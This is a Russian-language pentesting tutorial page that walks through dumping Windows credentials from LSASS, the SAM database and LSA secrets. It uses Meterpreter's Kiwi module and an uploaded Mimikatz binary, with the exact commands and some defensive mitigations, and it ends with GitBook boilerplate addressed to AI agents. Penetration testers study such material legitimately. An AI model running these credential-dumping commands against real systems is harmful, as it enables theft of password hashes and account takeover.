> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-hash-dumping-with-mimikatz.md).

# Дамп хешей Windows с Mimikatz

Mimikatz и модуль Meterpreter Kiwi могут извлекать секреты Windows из LSASS, базы SAM и секретов LSA. Используйте результаты, чтобы оценить последствия локального доступа или скомпрометированной сессии.

## Модуль Meterpreter Kiwi

```
load kiwi
```

<figure><img src="/files/8d8fd43dfd6ddcd8bc55d08ac3d5b99ac5984f49" alt="Loading Kiwi in Meterpreter"><figcaption></figcaption></figure>

Список доступных учетных данных:

```
creds_all
```

<figure><img src="/files/dfb22d3e60ef934d47060f6fefc46a8de7051827" alt="Kiwi credential listing"><figcaption></figcaption></figure>

## Снять дамп SAM и секретов LSA

```
lsa_dump_sam
```

<figure><img src="/files/69341c8d671d76e3f8a2469f09a65fa4716b0115" alt="SAM dump with Kiwi"><figcaption></figcaption></figure>

```
lsa_dump_secrets
```

<figure><img src="/files/fcf574b7a547f2d7702a8445ff58f351957ba1d3" alt="LSA secrets dump with Kiwi"><figcaption></figcaption></figure>

## Запустить Mimikatz

```
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords
```

<figure><img src="/files/6a13aed3a10fce5b785d76d609aaffa94f0347c5" alt="Uploading Mimikatz"><figcaption></figcaption></figure>

<figure><img src="/files/fd8aa69f7d836a0d1778d62ed1a2ae32a27ace6e" alt="Mimikatz SAM and secrets commands"><figcaption></figcaption></figure>

<figure><img src="/files/150e4f6b7968967656294f7aac3ad832e8885706" alt="Mimikatz credential output"><figcaption></figcaption></figure>

## Ключевые моменты

* LSASS может содержать учетные данные из активных сеансов входа.
* SAM содержит NTLM-хэши локальных учетных записей.
* Устраните риск с помощью Credential Guard, ограничения доступа локальных администраторов и мониторинга доступа к LSASS.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/windows-vulnerabilities/local-privilege-escalation-and-credentials/windows-hash-dumping-with-mimikatz.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
